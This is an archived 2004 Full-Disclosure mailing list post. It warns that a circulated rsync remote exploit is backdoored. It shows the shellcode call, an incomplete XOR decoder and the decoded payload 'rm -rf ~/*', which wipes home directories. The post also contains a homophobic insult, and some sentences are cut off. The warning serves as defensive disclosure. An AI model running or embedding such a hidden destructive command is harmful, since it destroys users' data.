[Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't run it!!!

From: DownBload / Illegal Instruction Labs (downbload_at_hotmail.com)
Date: 05/29/04

  • Next message: Etaoin Shrdlu: "Re: [Full-Disclosure] Printer Buffer Security??"
    To: full-disclosure@lists.netsys.com
    Date: Sat, 29 May 2004 15:24:09 +0200

    rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and
    malicious exploit.
    Don't run it!!!

    void (*funct) ();
    (long) funct = &shellcode2;

    "shellcode2" is a malicious asm code that will delete your home directory.
    Shellcode is encrypted with a simple XOR algorithm to obscure its main
    Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot
    I can understand people who backdoor exploits to hack machines, but placing
    backdoors that will delete user home dir is evil and plain stupid.

    [rot@laptop BACKDOOR]# gcc back.c
    [root@laptop BACKDOOR]# ./a.out
    % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l

    ---cut here---
    char shellcode2[] =

    main (int argc, char **argv)
            char *decrypt = shellcode2+23, key=0xff;
            int x;
            for (x=0;x<0x29;x++) {
                    printf ("%c ", *decrypt ^ key);

    ---cut here---

    Add photos to your e-mail with MSN 8. Get 2 months FREE*.

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Etaoin Shrdlu: "Re: [Full-Disclosure] Printer Buffer Security??"